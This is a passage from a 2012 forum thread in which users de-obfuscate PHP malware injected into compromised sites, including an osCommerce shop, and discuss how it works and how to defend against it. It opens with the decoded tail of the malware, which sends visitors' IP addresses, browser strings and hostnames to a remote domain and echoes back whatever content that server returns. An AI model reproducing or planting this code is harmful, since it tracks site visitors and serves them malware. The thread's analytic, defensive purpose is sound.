	if((preg_match("/" . implode("|", array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler")) . "/i", $_SERVER["HTTP_USER_AGENT"])) or (isset($_COOKIE["stats"]))) {}
	else {
		@setcookie("stats",md5("stats"),time()+10800);
		$contents = file_get_contents("http://f528764d624db129b32c21fbca0cb8d6.com/in.php?i=".$_SERVER["REMOTE_ADDR"]."&b=".urlencode($_SERVER["HTTP_USER_AGENT"])."&h=".urlencode($_SERVER["HTTP_HOST"]));
		if (strstr($contents,"!go!")){
			$contents = explode("!go!",$contents);
			$contents = $contents[1];
			echo $contents;
		}
	}
	$evalUdCXTDQERmWnDS = 18792;
}
?>

That last bit of code involving $evalUdCXTDQERmWnDS basically makes the "inner" script idempotent. The "outer" script is also idempotent.

So, f528764d624db129b32c21fbca0cb8d6.com is the culprit; the homepage is a facade, but it really tracks visitors to your site and, under the right conditions, emits malware to the browser.

Confuser · « **Reply #8 on:** January 14, 2012, 04:42:01 AM »

strrev("ecalper_gerp"); = preg_replace... not grep

Pinako · « **Reply #9 on:** January 14, 2012, 12:57:43 PM »

Quote from: Confuser on January 14, 2012, 04:42:01 AM

strrev("ecalper_gerp"); = preg_replace... not grep

D'oh, fixed; thanks for pointing it out. I probably should not be taking code apart at 3 in the morning

rramlani · « **Reply #10 on:** February 06, 2012, 03:39:17 PM »

Pinako,
Thanks so much for de-obfuscating the code. I had been struggling with it for a few weeks myself until I saw your post. My Oscommerce site was recently hacked and this malware was injected at the end of a bunch of php files. I have been trying to figure out how someone was able to get in the files and inject the code. I have a script cleaning all the post and get variables prior to processing them. I am trying to learn ways to safeguard my site to prevent any such future attacks and would appreciate any help I can get in understanding the mechanism of injection. I am not looking for step by step directions for hacking someone's site. Just a general knowledge of the possible ways that this malware could have been injected so I can prevent it in future. For now, I did a regex on all my files and cleaned them.
Thanks

Author Topic: Help De-Obfsucating Code (Read 226 times)

waltersart

Help De-Obfsucating Code

EpicCyndaquil

Re: Help De-Obfsucating Code

zzbomb

Re: Help De-Obfsucating Code

Primefalcon

Re: Help De-Obfsucating Code

rvtraveller

Re: Help De-Obfsucating Code

Primefalcon

Re: Help De-Obfsucating Code

Pinako

Re: Help De-Obfsucating Code

Pinako

Re: Help De-Obfsucating Code

Confuser

Re: Help De-Obfsucating Code

Pinako

Re: Help De-Obfsucating Code

rramlani

Re: Help De-Obfsucating Code